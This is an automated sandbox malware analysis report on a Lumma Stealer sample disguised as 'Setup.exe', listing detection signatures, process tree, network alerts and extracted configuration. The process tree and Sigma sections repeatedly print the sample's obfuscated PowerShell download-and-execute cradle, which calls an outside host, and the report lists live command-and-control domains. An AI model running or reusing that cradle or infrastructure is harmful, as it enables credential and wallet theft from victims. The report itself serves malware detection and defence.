Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Setup.exe

Overview

General Information

Sample name:Setup.exe
Analysis ID:1583071
MD5:f24fcf422c2611892a30adf91d85f556
SHA1:87d13ac981079a41cbaa7df94d82d4818bf49444
SHA256:3ec2c8a5d04cb1407b981cecd39f2d95f99cfa7e76d4a31f81f23b430feb4da5
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample or dropped binary is a compiled AutoHotkey binary
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Setup.exe (PID: 7316 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: F24FCF422C2611892A30ADF91D85F556)
    • powershell.exe (PID: 7640 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Fg MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WPNMSIA79IRF0S6IHRZ7TIDHI.exe (PID: 7868 cmdline: "C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe" MD5: 51F99EDDD33CC04FB0F55F873B76D907)
      • WPNMSIA79IRF0S6IHRZ7TIDHI.tmp (PID: 7900 cmdline: "C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp" /SL5="$20460,7785838,845824,C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe" MD5: F809F51E678B7F2E388F8C969EF902C8)
        • WPNMSIA79IRF0S6IHRZ7TIDHI.exe (PID: 7976 cmdline: "C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe" /VERYSILENT MD5: 51F99EDDD33CC04FB0F55F873B76D907)
          • WPNMSIA79IRF0S6IHRZ7TIDHI.tmp (PID: 7996 cmdline: "C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp" /SL5="$B0060,7785838,845824,C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe" /VERYSILENT MD5: F809F51E678B7F2E388F8C969EF902C8)
            • timeout.exe (PID: 8092 cmdline: "timeout" 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)
              • conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 1880 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 4180 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 3604 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 3704 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 6096 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 7212 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 1344 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 3336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 7308 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 1516 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 6676 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 332 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 5816 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 7424 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 2816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 2488 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 5600 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 2656 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 7556 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 2992 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • BrightLib.exe (PID: 7628 cmdline: "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" MD5: 6A8860A8150021B2D5B9BB707DE4FA37)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["tirepublicerj.shop", "nearycrepso.shop", "abberanteusz.click", "abruptyopsn.shop", "cloudewahsj.shop", "framekgirus.shop", "wholersorie.shop", "rabidcowse.shop", "noisycuttej.shop"], "Build id": "hRjzG3--GAS"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1842566188.0000000000676000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
          • 0x4eb53:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
          Process Memory Space: Setup.exe PID: 7316JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Process Memory Space: Setup.exe PID: 7316JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 2 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: PowerShell Download and Execution Cradles
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Fg, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Fg, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Setup.exe", ParentImage: C:\Users\user\Desktop\Setup.exe, ParentProcessId: 7316, ParentProcessName: Setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Fg, ProcessId: 7640, ProcessName: powershell.exe
              Sigma detected: Suspicious PowerShell Parameter Substring
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Fg, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Fg, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Setup.exe", ParentImage: C:\Users\user\Desktop\Setup.exe, ParentProcessId: 7316, ParentProcessName: Setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Fg, ProcessId: 7640, ProcessName: powershell.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Fg, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Fg, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Setup.exe", ParentImage: C:\Users\user\Desktop\Setup.exe, ParentProcessId: 7316, ParentProcessName: Setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Fg, ProcessId: 7640, ProcessName: powershell.exe
              Sigma detected: PowerShell Web Download
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Fg, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Fg, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Setup.exe", ParentImage: C:\Users\user\Desktop\Setup.exe, ParentProcessId: 7316, ParentProcessName: Setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Fg, ProcessId: 7640, ProcessName: powershell.exe
              Sigma detected: Usage Of Web Request Commands And Cmdlets
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Fg, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Fg, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Setup.exe", ParentImage: C:\Users\user\Desktop\Setup.exe, ParentProcessId: 7316, ParentProcessName: Setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Fg, ProcessId: 7640, ProcessName: powershell.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Fg, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Fg, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Setup.exe", ParentImage: C:\Users\user\Desktop\Setup.exe, ParentProcessId: 7316, ParentProcessName: Setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Fg, ProcessId: 7640, ProcessName: powershell.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-01T19:04:08.344709+010020283713Unknown Traffic192.168.2.449730172.67.198.102443TCP
              2025-01-01T19:04:09.311045+010020283713Unknown Traffic192.168.2.449731172.67.198.102443TCP
              2025-01-01T19:04:11.270377+010020283713Unknown Traffic192.168.2.449732172.67.198.102443TCP
              2025-01-01T19:04:12.448901+010020283713Unknown Traffic192.168.2.449733172.67.198.102443TCP
              2025-01-01T19:04:14.278008+010020283713Unknown Traffic192.168.2.449735172.67.198.102443TCP
              2025-01-01T19:04:15.682517+010020283713Unknown Traffic192.168.2.449739172.67.198.102443TCP
              2025-01-01T19:04:17.006219+010020283713Unknown Traffic192.168.2.449741172.67.198.102443TCP
              2025-01-01T19:04:18.066412+010020283713Unknown Traffic192.168.2.449743172.67.198.102443TCP
              2025-01-01T19:04:19.451220+010020283713Unknown Traffic192.168.2.449744185.161.251.21443TCP
              2025-01-01T19:04:20.291151+010020283713Unknown Traffic192.168.2.449745104.21.37.128443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-01T19:04:08.816400+010020546531A Network Trojan was detected192.168.2.449730172.67.198.102443TCP
              2025-01-01T19:04:09.783359+010020546531A Network Trojan was detected192.168.2.449731172.67.198.102443TCP
              2025-01-01T19:04:18.594781+010020546531A Network Trojan was detected192.168.2.449743172.67.198.102443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-01T19:04:08.816400+010020498361A Network Trojan was detected192.168.2.449730172.67.198.102443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-01T19:04:09.783359+010020498121A Network Trojan was detected192.168.2.449731172.67.198.102443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-01T19:04:20.680174+010020084381A Network Trojan was detected104.21.37.128443192.168.2.449745TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-01T19:04:17.558778+010020480941Malware Command and Control Activity Detected192.168.2.449741172.67.198.102443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://klipvumisui.shop/int_clp_sha.txtotAvira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/int_clp_sha.txtPEAvira URL Cloud: Label: malware
              Source: https://cegu.shop/8574262446/ph.txt8QAvira URL Cloud: Label: malware
              Source: https://cegu.shop/HQAvira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/int_clp_sha.txtR3SFAvira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/Avira URL Cloud: Label: malware
              Found malware configuration
              Source: Setup.exe.7316.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["tirepublicerj.shop", "nearycrepso.shop", "abberanteusz.click", "abruptyopsn.shop", "cloudewahsj.shop", "framekgirus.shop", "wholersorie.shop", "rabidcowse.shop", "noisycuttej.shop"], "Build id": "hRjzG3--GAS"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exeReversingLabs: Detection: 52%
              Multi AV Scanner detection for submitted file
              Source: Setup.exeVirustotal: Detection: 13%Perma Link
              Source: Setup.exeReversingLabs: Detection: 31%
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: rabidcowse.shop
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: noisycuttej.shop
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: framekgirus.shop
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: wholersorie.shop
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: nearycrepso.shop
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: abberanteusz.click
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmpString decryptor: hRjzG3--GAS
              Source: Setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49735 version: TLS 1.2
